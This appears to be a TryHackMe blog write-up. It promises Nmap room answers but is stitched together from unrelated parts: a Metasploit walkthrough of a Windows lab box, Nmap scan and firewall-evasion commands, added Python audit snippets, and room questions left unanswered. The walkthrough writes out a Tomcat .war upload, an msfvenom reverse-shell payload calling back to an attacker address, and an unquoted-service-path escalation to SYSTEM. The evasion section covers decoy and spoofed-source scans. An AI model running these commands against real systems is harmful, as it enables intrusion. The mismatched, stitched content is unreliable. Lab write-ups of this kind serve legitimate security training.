Summary
In this post, we cover Nmap scanning commands and techniques from beginner to advanced: TCP connect scan, stealth (SYN) scan, UDP scan, ACK scan, decoy scan, fragmented scan, and more. This is part of the TryHackMe Junior Penetration Tester pathway.
This post covers the answers for
Challenge Description
When we want to target a network, we want to find an efficient tool to help us handle repetitive tasks and answer the following questions:
- Which systems are up?
- What services are running on these systems?
The tool that we will rely on is Nmap. The first question about finding live computers is answered in this room. This room is the first in a series of four rooms dedicated to Nmap. The second question about discovering running services is answered in the next Nmap rooms that focus on port-scanning.
Initial Reconnaissance and Web Exploitation
I started by running an Nmap scan to identify open ports on the target machine. My scan revealed several open ports, including 80 (HTTP), 135 (RPC), 139 (NetBIOS), 445 (SMB), and 8080 (HTTP). The presence of ports 135, 139, and 445 immediately told me it was a Windows machine.
I then navigated to the website on port 80, which was a static page. However, when I checked port 8080, I found a web server running Apache Tomcat/8.5.31. This was a promising lead! I noticed that the default Tomcat page was displayed, which often includes a “Manager App” link.
I tried to access the /manager/html directory, but it required authentication. This is a common scenario, so I decided to look for default credentials or vulnerabilities in Tomcat. I remembered that Tomcat versions can sometimes be vulnerable to specific exploits.
I used Metasploit’s exploit/multi/http/tomcat_mgr_upload module to try to gain access. This module attempts to upload a malicious .war file (Web Application Archive) to the Tomcat Manager. I set RHOSTS to the target IP, RPORT to 8080, and LHOST to my attacking machine’s IP. I also needed to set LPORT for my reverse shell. After running the exploit, it successfully uploaded the .war file and gave me a meterpreter session!
- Commands in Metasploit:
use exploit/multi/http/tomcat_mgr_upload
set RHOSTS <TARGET_IP>
set RPORT 8080
set LHOST <YOUR_IP>
set LPORT 4444
(or any chosen port)
exploit
Initial Foothold and User Flag
Once I had the meterpreter session, I could interact with the compromised system. I used the shell command to drop into a Windows command prompt.
- Command in Meterpreter:
shell
From the command prompt, I wanted to find the user flag. I navigated to the Users directory and then to the bill user’s desktop.
- Commands in Windows Shell:
cd Users
cd bill
cd Desktop
type user.txt
(This command displays the contents of user.txt, revealing the user flag.)
Privilege Escalation
Now that I had the user flag, my next objective was to escalate privileges to administrator. I needed to find a vulnerability that would allow me to move from the bill user to a higher-privileged account.
I used systeminfo to gather information about the system, specifically the OS version and installed hotfixes.
- Command in Windows Shell:
systeminfo
I then transferred winPEAS.exe (a privilege escalation enumeration tool) to the target machine using the upload command in Meterpreter.
- Command in Meterpreter:
upload /path/to/your/winPEAS.exe C:\\Users\\bill\\Desktop\\winPEAS.exe
After running winPEAS.exe on the target, it highlighted a potential vulnerability related to unquoted service paths. This is a common issue where a service executable’s path isn’t enclosed in quotes, allowing an attacker to inject their own executable if they can write to a directory within that path.
- Command in Windows Shell (to run winPEAS):
C:\Users\bill\Desktop\winPEAS.exe
I identified the AdvancedSystemCareService9 service as having an unquoted path: C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe. This meant I could potentially place a malicious executable named Program.exe in C:\Program Files (x86)\IObit\ and it would be executed when the service started.
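As an added example from the defensive side (my own code, not winPEAS or any Microsoft tool), the following Python audit flags service ImagePath values that are unquoted and contain spaces, which is exactly the condition winPEAS reported above, and produces the quoted value that fixes them. The service table is constructed; only the IObit path comes from this write-up, and the check assumes ImagePath values of the form <exe path><arguments>.

```python
"""Audit Windows service ImagePath values for the unquoted-path weakness
described above and produce the quoted fix. Added example for this
write-up, not part of winPEAS or any Microsoft tool. The service table
below is constructed; only the IObit path is taken from the write-up."""
import re

# An ImagePath is "<path-to-exe><optional arguments>". Capture up to the
# first ".exe" as the binary and keep whatever follows as its arguments.
_EXE_RE = re.compile(r"^(.*?\.exe)(.*)$", re.IGNORECASE)


def audit_image_path(image_path: str) -> dict:
    """Return whether the path is unquoted with spaces, plus a fixed value.

    A path that already starts with a double quote is fine. A path without
    spaces is fine even if unquoted, because the service control manager can
    resolve it without ambiguity. A path that is unquoted and contains spaces
    is the weakness winPEAS reports; the fix is to quote the executable path.
    """
    path = image_path.strip()
    if path.startswith('"'):
        return {"vulnerable": False, "fixed": path}
    match = _EXE_RE.match(path)
    if match is None:
        # Not an .exe command line (e.g. a driver); review by hand.
        return {"vulnerable": False, "fixed": path}
    exe, args = match.group(1), match.group(2)
    if " " not in exe:
        return {"vulnerable": False, "fixed": path}
    return {"vulnerable": True, "fixed": f'"{exe}"{args}'}


def audit_services(services: dict) -> list:
    """Run the check over a {service_name: ImagePath} mapping.

    Returns [(service_name, original_path, fixed_path)] for each finding.
    In practice the mapping is collected from
    HKLM\\SYSTEM\\CurrentControlSet\\Services\\<name>\\ImagePath or `sc qc`.
    """
    findings = []
    for name, image_path in services.items():
        result = audit_image_path(image_path)
        if result["vulnerable"]:
            findings.append((name, image_path, result["fixed"]))
    return findings


# Constructed sample; the AdvancedSystemCareService9 entry mirrors the write-up.
SAMPLE_SERVICES = {
    "AdvancedSystemCareService9": r"C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe",
    "GoodVendorSvc": r'"C:\Program Files\Good Vendor\goodsvc.exe" -service',
    "Spooler": r"C:\Windows\System32\spoolsv.exe",
    "Schedule": r"C:\Windows\system32\svchost.exe -k netsvcs",
}

if __name__ == "__main__":
    for name, original, fixed in audit_services(SAMPLE_SERVICES):
        print(f"{name}: unquoted path with spaces\n  found: {original}\n  fix:   {fixed}")
```

Only the executable portion is examined, so a space inside the arguments (as in the svchost entry) does not raise a finding; the remediation for a true finding is to rewrite the ImagePath with the quoted value returned in "fixed".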
I generated a malicious .exe payload using msfvenom to get a reverse shell as a higher-privileged user.
- Command in Kali Linux:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<YOUR_IP> LPORT=5555 -f exe -o Program.exe
I then uploaded this Program.exe to C:\Program Files (x86)\IObit\ on the target machine using Meterpreter’s upload command.
- Command in Meterpreter:
upload /path/to/your/Program.exe "C:\\Program Files (x86)\\IObit\\Program.exe"
Before restarting the service, I set up a new multi/handler in Metasploit to catch the incoming shell from my malicious Program.exe.
- Commands in Metasploit:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <YOUR_IP>
set LPORT 5555
exploit
Finally, I restarted the AdvancedSystemCareService9 service. This caused my Program.exe to execute, and I caught a new meterpreter session, this time as NT AUTHORITY\SYSTEM (full administrator privileges)!
- Command in Windows Shell (to restart service):
sc stop AdvancedSystemCareService9
sc start AdvancedSystemCareService9
Root Flag Retrieval
With full system access, I could now retrieve the root flag. I navigated to the Administrator’s desktop.
- Commands in new Meterpreter session:
shell
cd C:\Users\Administrator\Desktop
type root.txt
(This command displayed the contents of root.txt, revealing the root flag.)
This challenge was a great exercise in combining web exploitation with Windows privilege escalation techniques.
I also just finished watching a video that dives deep into Nmap scanning techniques, revisiting the Junior Penetration Tester pathway on TryHackMe. I focused on the practical commands and concepts rather than just the theory. Here’s a breakdown of what I covered:
Nmap Scanning Techniques
TCP Connect Scan (-sT)
This is the default scan type if I’m not running as root. It completes the full TCP three-way handshake, making it easily detectable by firewalls and administrators. It doesn’t require elevated privileges.
- Command:
nmap -sT [IP_ADDRESS]
Stealth Scan / SYN Scan (-sS)
This scan requires root privileges. It’s considered stealthier because it doesn’t complete the full TCP handshake. Instead, after receiving a SYN-ACK, it sends a RST packet to tear down the connection.
- Command:
sudo nmap -sS [IP_ADDRESS]
UDP Scan (-sU)
I use this to scan UDP ports. It’s trickier to determine port status with UDP because it’s connectionless. If a port is closed, the target usually responds with an ICMP “port unreachable” message. If there’s no response, the port is considered open or filtered.
- Command:
nmap -sU [IP_ADDRESS]
- Command (for a faster scan of common ports):
nmap -sU -F [IP_ADDRESS]
Timing (-T)
This option controls the speed of the scan. Options range from -T0 (paranoid, very slow for IDS/firewall evasion) to -T5 (insane, very fast and noisy). I can also use --min-rate and --max-rate to control packets per second.
Null Scan (-sN)
This sends TCP packets with no flags set. If a port is open or filtered, there’s no response. If it’s closed, the target sends a RST packet.
- Command:
nmap -sN [IP_ADDRESS]
FIN Scan (-sF)
Similar to a Null scan, this sends TCP packets with only the FIN flag set. It behaves the same way in terms of responses for open/filtered and closed ports.
- Command:
nmap -sF [IP_ADDRESS]
Xmas Scan (-sX)
This sends TCP packets with the FIN, PSH, and URG flags set. Like Null and FIN scans, its behavior helps in understanding firewall rules.
- Command:
nmap -sX [IP_ADDRESS]
ACK Scan (-sA)
I use this to map out firewall rule sets by sending TCP packets with only the ACK flag set. The target should always respond with a RST packet, whether the port is open or closed. Nmap considers a port “unfiltered” if a RST is received, and “filtered” if no response comes back.
- Command:
nmap -sA [IP_ADDRESS]
Window Scan (-sW)
Similar to the ACK scan, this can sometimes differentiate open ports from closed ones by examining the TCP window field in the returned RST packet.
- Command:
nmap -sW [IP_ADDRESS]
Custom TCP Scan Flags (--scanflags)
This allows me to specify custom TCP flags. For example, to set only the RST flag:
- Command:
nmap --scanflags RST [IP_ADDRESS]
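As an added example (my own code, not part of Nmap or the TryHackMe material), the following Python decodes the flags byte of a raw TCP header and names the probe type it corresponds to, which is how a packet capture review or an IDS rule tells a Null, FIN, Xmas, SYN or ACK probe apart on the receiving end. It covers every scan type listed above rather than one of them. The headers are constructed with a small packer; the only assumption is the standard 20-byte TCP header layout (RFC 793, with ECE/CWR from RFC 3168).

```python
"""Decode the flags byte of a raw TCP header and name the Nmap probe type
(Null, FIN, Xmas, SYN, ACK, custom RST) it corresponds to. Added example for
this write-up; it is not Nmap code. The headers below are constructed."""
import struct
from collections import Counter

# Flag bits of byte 13 of the TCP header (RFC 793, with ECE/CWR from RFC 3168).
TCP_FLAGS = {
    "CWR": 0x80, "ECE": 0x40, "URG": 0x20, "ACK": 0x10,
    "PSH": 0x08, "RST": 0x04, "SYN": 0x02, "FIN": 0x01,
}


def build_tcp_header(sport: int, dport: int, flags: int, window: int = 1024) -> bytes:
    """Pack a minimal 20-byte TCP header with no options (constructed test data)."""
    data_offset = 5 << 4  # header length in 32-bit words, stored in the high nibble
    return struct.pack("!HHIIBBHHH", sport, dport, 0, 0, data_offset, flags, window, 0, 0)


def parse_tcp_flags(header: bytes) -> set:
    """Return the names of the flags set in a TCP header."""
    if len(header) < 20:
        raise ValueError("TCP header is at least 20 bytes")
    flags_byte = header[13]
    return {name for name, bit in TCP_FLAGS.items() if flags_byte & bit}


def classify_probe(flags: set) -> str:
    """Map a flag combination onto the scan types described above."""
    if not flags:
        return "null scan (-sN)"
    if flags == {"FIN"}:
        return "FIN scan (-sF)"
    if flags == {"FIN", "PSH", "URG"}:
        return "Xmas scan (-sX)"
    if flags == {"SYN"}:
        return "SYN (connect/-sT, -sS or a normal client)"
    if flags == {"ACK"}:
        return "ACK only (-sA, -sW or established traffic)"
    if flags == {"RST"}:
        return "RST only (--scanflags RST)"
    return "other"


def summarize_probes(headers) -> Counter:
    """Count probe types over a list of captured TCP headers (the defender's tally)."""
    return Counter(classify_probe(parse_tcp_flags(h)) for h in headers)


# Constructed capture: one probe of each unusual flag combination plus SYN and ACK.
SAMPLE_HEADERS = [
    build_tcp_header(40001, 22, 0x00),                                                  # null
    build_tcp_header(40002, 22, TCP_FLAGS["FIN"]),                                      # FIN
    build_tcp_header(40003, 22, TCP_FLAGS["FIN"] | TCP_FLAGS["PSH"] | TCP_FLAGS["URG"]),  # Xmas
    build_tcp_header(40004, 22, TCP_FLAGS["SYN"]),                                      # SYN
    build_tcp_header(40005, 22, TCP_FLAGS["ACK"]),                                      # ACK
]

if __name__ == "__main__":
    for h in SAMPLE_HEADERS:
        flags = parse_tcp_flags(h)
        print(f"{sorted(flags) or ['<none>']}: {len(flags)} flag(s) set -> {classify_probe(flags)}")
    print(summarize_probes(SAMPLE_HEADERS))
```

The length of the returned flag set is the number of flags set to 1 in the probe (one for a FIN probe, three for an Xmas probe), and a SYN-only segment is deliberately left ambiguous because it is also what every legitimate client sends first.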
Firewall Evasion Techniques
I explored several ways to evade firewalls:
- Fragmentation (-f, -ff): Splits the packet, TCP header included, into smaller IP fragments. -f uses 8-byte fragments, -ff uses 16-byte fragments.
- Command:
nmap -sS -T1 -f [IP_ADDRESS]
- Command:
nmap -ff [IP_ADDRESS]
- Decoy Scan (-D): Makes the scan appear to originate from multiple IP addresses.
- Command (uses 10 random IPs):
nmap -D RND:10 [IP_ADDRESS]
- Command (ME represents my actual IP):
nmap -D decoy_ip1,decoy_ip2,ME [IP_ADDRESS]
- Spoof Source IP (-S): Makes the scan appear to come from a single, specific spoofed IP. This requires being on the same network or using a sniffer on the spoofed host to see results.
- Command:
nmap -e [INTERFACE] -Pn -S spoofed_ip [TARGET_IP]
- Spoof MAC Address (--spoof-mac): Used to change the source MAC address.
- Source Port Specification (--source-port or -g): Specifies the source port Nmap uses.
- Idle Scan (-sI): A very stealthy scan that bounces off a “zombie” host.
- Changing User Agent (--script-args http.useragent="USER_AGENT_STRING"): Can be used with HTTP scripts to change the user agent.
- Command:
nmap -sV --script http-headers --script-args http.useragent="Googlebot" [IP_ADDRESS]
Service and OS Detection
- Service Version Detection (-sV): Attempts to determine the version of services running on open ports. Its probes must complete the TCP three-way handshake, so adding it to a stealth scan (-sS) gives up that stealth. I can control its intensity with --version-intensity [0-9] or use --version-light.
- Command:
nmap -sV [IP_ADDRESS]
- OS Detection (-O): Attempts to identify the operating system of the target by fingerprinting its TCP/IP stack characteristics.
- Command:
nmap -O [IP_ADDRESS]
Nmap Scripting Engine (NSE)
The Nmap Scripting Engine (NSE) uses Lua scripts to extend Nmap’s functionality for tasks like vulnerability scanning, brute-forcing, and advanced discovery. Scripts are located in /usr/share/nmap/scripts/.
- Default scripts (-sC or --script default): Runs a safe set of default scripts.
- Command:
nmap --script default [IP_ADDRESS]
- Command:
nmap -sC [IP_ADDRESS]
- Specific script: I can run a specific script by name.
- Example:
nmap --script ssh2-enum-algos [IP_ADDRESS]
- I used ls /usr/share/nmap/scripts/ | grep robots to find a script related to robots.txt, and ls /usr/share/nmap/scripts/ | grep 2020-0712 for a specific CVE.
Saving Output
Finally, I learned how to save Nmap’s output in various formats:
- Normal format (-oN): Human-readable.
- Command:
nmap -sV [IP_ADDRESS] -oN output.nmap
- Grepable format (-oG): Easy to parse with tools like grep.
- Command:
nmap -sV [IP_ADDRESS] -oG output.gnmap
- I used cat scans.gnmap | grep https and cat scans.gnmap | grep 8089 to filter results.
- XML format (-oX): Useful for processing with other programs.
- Command:
nmap -sV [IP_ADDRESS] -oX nmap.xml
- All formats (-oA): Saves in all three formats using the same base filename.
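As an added example (my own code, not Nmap’s and not from the room), here is a small Python parser for the grepable format that answers the same questions as the grep pipelines above, but structurally: which hosts expose a given service in a given state, and which host has a given port open, without false matches on version strings. The scan text is constructed in the .gnmap layout (one "Host:" line per host, tab-separated fields, port entries separated by ", "); it assumes version strings do not themselves contain ", ".

```python
"""Parse Nmap grepable (-oG) output and answer the questions the write-up
answers with grep: which hosts expose a service, which host listens on a
port. Added example for this write-up; it is not Nmap code. The scan text
is constructed, not a real scan."""
import ipaddress
from collections import namedtuple

PortInfo = namedtuple("PortInfo", "port state proto service version")

# Constructed sample in the .gnmap layout: one "Host:" line per host, fields
# separated by tabs, and port entries separated by ", " inside the Ports field.
SAMPLE_GNMAP = (
    "# Nmap 7.80 scan initiated (constructed sample)\n"
    "Host: 10.10.1.5 ()\tStatus: Up\n"
    "Host: 10.10.1.5 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.6p1/, "
    "443/open/tcp//https//nginx 1.18.0/\tIgnored State: closed (998)\n"
    "Host: 10.10.1.9 ()\tPorts: 80/open/tcp//http//Apache httpd 2.4.41/, "
    "443/filtered/tcp//https///, 8089/open/tcp//unknown///\tIgnored State: closed (997)\n"
    "Host: 10.10.1.12 ()\tPorts: 443/open/tcp//https//Apache httpd 2.4.41/\tIgnored State: closed (999)\n"
    "# Nmap done -- 3 IP addresses (3 hosts up) scanned\n"
)


def parse_gnmap(text: str) -> dict:
    """Return {ip: [PortInfo, ...]} for every host line that has a Ports field."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue  # comment header and trailer lines
        fields = line.split("\t")
        ip = fields[0].split()[1]  # "Host: 10.10.1.5 ()" -> "10.10.1.5"
        for field in fields[1:]:
            if not field.startswith("Ports:"):
                continue  # e.g. "Status: Up" or "Ignored State: ..."
            # Assumes version strings contain no ", " (true for this sample).
            for entry in field[len("Ports:"):].split(", "):
                parts = entry.strip().split("/")
                # Entry layout: port/state/proto/owner/service/rpc/version/
                hosts.setdefault(ip, []).append(
                    PortInfo(int(parts[0]), parts[1], parts[2], parts[4], parts[6]))
    return hosts


def _sorted_ips(ips):
    """Sort numerically by address rather than as strings."""
    return sorted(ips, key=ipaddress.ip_address)


def hosts_with_service(scan: dict, service: str, state: str = "open") -> list:
    """IPs with at least one port whose service name matches, in the given state."""
    return _sorted_ips(ip for ip, ports in scan.items()
                       if any(p.service == service and p.state == state for p in ports))


def hosts_listening_on(scan: dict, port: int, proto: str = "tcp") -> list:
    """IPs on which the given port is open."""
    return _sorted_ips(ip for ip, ports in scan.items()
                       if any(p.port == port and p.proto == proto and p.state == "open"
                              for p in ports))


if __name__ == "__main__":
    scan = parse_gnmap(SAMPLE_GNMAP)
    print("HTTPS hosts:", hosts_with_service(scan, "https"))
    print("Listening on 8089:", hosts_listening_on(scan, 8089))
```

The state filter matters: a plain grep for "https" would also count the host where 443 is filtered, whereas hosts_with_service only returns the two hosts where the port is actually open. For XML output (-oX) the same questions are usually answered with an XML parser instead, since that format carries the same fields with proper structure.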
I’ll be moving on to the “Protocols and Servers” rooms next to complete the Junior Penetration Tester track!
TryHackMe Nmap Answers
How many IP addresses will Nmap scan if you provide the following range 10.10.12.13/29 as your target?
How many IP addresses will Nmap scan if you provide the following range 10.10.0-255.101-125?
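As an added example (my own code, not Nmap’s), the Python below expands a target specification the way Nmap does for CIDR notation (every address in the block, network and broadcast addresses included) and for per-octet ranges, so a scan can be sized before it is run. It goes beyond the two specifications in the questions: it also accepts comma lists within an octet and a range with an omitted bound, both of which Nmap allows.

```python
"""Expand an Nmap-style target specification (CIDR such as 10.10.12.13/29 or
per-octet ranges such as 10.10.0-255.101-125) and count the addresses Nmap
would scan. Added example for this write-up; it is not Nmap code."""
import ipaddress
import itertools


def _expand_octet(part: str) -> list:
    """'13' -> [13]; '0-255' -> 0..255; '-' -> 0..255; '1,5-7' -> [1, 5, 6, 7]."""
    values = []
    for piece in part.split(","):
        if "-" in piece:
            lo, _, hi = piece.partition("-")
            lo = int(lo) if lo else 0      # Nmap lets either bound be omitted
            hi = int(hi) if hi else 255
        else:
            lo = hi = int(piece)
        if not 0 <= lo <= hi <= 255:
            raise ValueError(f"bad octet range: {piece!r}")
        values.extend(range(lo, hi + 1))
    return values


def expand_targets(spec: str):
    """Yield every IPv4 address string the specification covers."""
    if "/" in spec:
        # CIDR: Nmap scans every address in the block, network and broadcast included.
        for addr in ipaddress.ip_network(spec, strict=False):
            yield str(addr)
        return
    octets = spec.split(".")
    if len(octets) != 4:
        raise ValueError(f"expected four octets: {spec!r}")
    for combo in itertools.product(*(_expand_octet(o) for o in octets)):
        yield ".".join(str(v) for v in combo)


def count_targets(spec: str) -> int:
    """Number of addresses, computed without materialising the whole list."""
    if "/" in spec:
        return ipaddress.ip_network(spec, strict=False).num_addresses
    total = 1
    for octet in spec.split("."):
        total *= len(_expand_octet(octet))
    return total


if __name__ == "__main__":
    for spec in ("10.10.12.13/29", "10.10.0-255.101-125", "10.10.1-2,9.-"):
        print(f"{spec}: {count_targets(spec)} addresses, first {next(expand_targets(spec))}")
```

count_targets is the per-octet product, which is why a range in two octets multiplies rather than adds; expand_targets is the list you would hand to an allow-list check before a scan of a shared network.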
Send a packet with the following:
- From computer1
- To computer3
- Packet Type: “Ping Request”
What is the type of packet that computer1 sent before the ping?
What is the type of packet that computer1 received before being able to send the ping?
How many computers responded to the ping request?
Send a packet with the following:
- From computer2
- To computer5
- Packet Type: “Ping Request”
What is the name of the first device that responded to the first ARP Request?
What is the name of the first device that responded to the second ARP Request?
Send another Ping Request. Did it require new ARP Requests? (Y/N)
We will be sending broadcast ARP Requests packets with the following options:
- From computer1
- To computer1 (to indicate it is broadcast)
- Packet Type: “ARP Request”
- Data: try all the possible eight devices (other than computer1) in the network: computer2, computer3, computer4, computer5, computer6, switch1, switch2, and router.
How many devices are you able to discover using ARP requests?
What is the option required to tell Nmap to use ICMP Address Mask to discover live hosts?
What is the option required to tell Nmap to use ICMP Echo to discover live hosts?
Which service uses TCP port 22 by default?
How many port states does Nmap consider?
Which port state is the most interesting to discover as a pentester?
Which flag needs to be set when you initiate a TCP connection (first packet of TCP 3-way handshake)?
Run nmap -sT MACHINE_IP via the terminal. A new service has been installed on this VM since our last scan. Which port number was closed in the scan above but is now open on this target VM?
What is Nmap’s guess about the newly installed service?
Run nmap -sS MACHINE_IP. What is the new open port?
What is Nmap’s guess of the service name?
Run nmap -sU -F -v MACHINE_IP. A new service has been installed since the last scan. What is the UDP port that is now open?
What is the service name according to Nmap?
How can you ensure that Nmap will run at least 64 probes in parallel?
What option would you add to make Nmap very slow and paranoid?
In a FIN scan, how many flags are set to 1?
In a Xmas scan, how many flags are set to 1?
Start the VM and load the AttackBox. Once both are ready, open the terminal on the AttackBox and use nmap to launch a FIN scan against the target VM. How many ports appear as open|filtered?
Repeat your scan launching a null scan against the target VM. How many ports appear as open|filtered?
You decided to experiment with a custom TCP scan that has the reset flag set. What would you add after --scanflags?
The VM received an update to its firewall ruleset. A new port is now allowed by the firewall. After you make sure that you have terminated the VM from Task 2, start the VM for this task. Launch the AttackBox if you haven’t done that already. Once both are ready, open the terminal on the AttackBox and use Nmap to launch an ACK scan against the target VM. How many ports appear unfiltered?
What is the new port number that appeared?
Is there any service behind the newly discovered port number? (Y/N)
What do you need to add to the command sudo nmap MACHINE_IP to make the scan appear as if coming from the source IP address 10.10.10.11 instead of your IP address?
What do you need to add to the command sudo nmap MACHINE_IP to make the scan appear as if coming from the source IP addresses 10.10.20.21 and 10.10.20.28 in addition to your IP address?
If the -ff option is being used, how many IP fragments will you get?
You decide to use 10.10.5.5 as a zombie in your idle scan. What argument should you add to your Nmap command?
Run nmap -sS -F --reason MACHINE_IP to scan the VM. What is the reason provided for the stated port(s) being open?
Start the target machine for this task and launch the AttackBox. Run nmap -sV --version-light MACHINE_IP via the AttackBox. What is the detected version for port 143?
--version-light?
Nmap scripts are saved in /usr/share/nmap/scripts on the AttackBox. What does the script http-robots.txt check for?
Can you figure out the name for the script that checks for the remote code execution vulnerability MS15-034 (CVE-2015-1635)?
Launch the AttackBox if you haven’t already. After you ensure you have terminated the VM from Task 2, start the target machine for this task. On the AttackBox, run Nmap with the default scripts -sC against MACHINE_IP. You will notice that there is a service listening on port 53. What is its full version value?
Based on its description, the script ssh2-enum-algos “reports the number of algorithms (for encryption, compression, etc.) that the target SSH2 server offers.” What is the name of the key exchange algorithm (kex_algorithms) that relies upon “sha1” and is supported by MACHINE_IP?
Terminate the target machine of the previous task and start the target machine for this task. On the AttackBox terminal, issue the command scp pentester@MACHINE_IP:/home/pentester/* . to download the Nmap reports in normal and grepable formats from the target virtual machine.
Note that the username pentester has the password THM17577
Check the attached Nmap logs. How many systems are listening on the HTTPS port?
What is the IP address of the system listening on port 8089?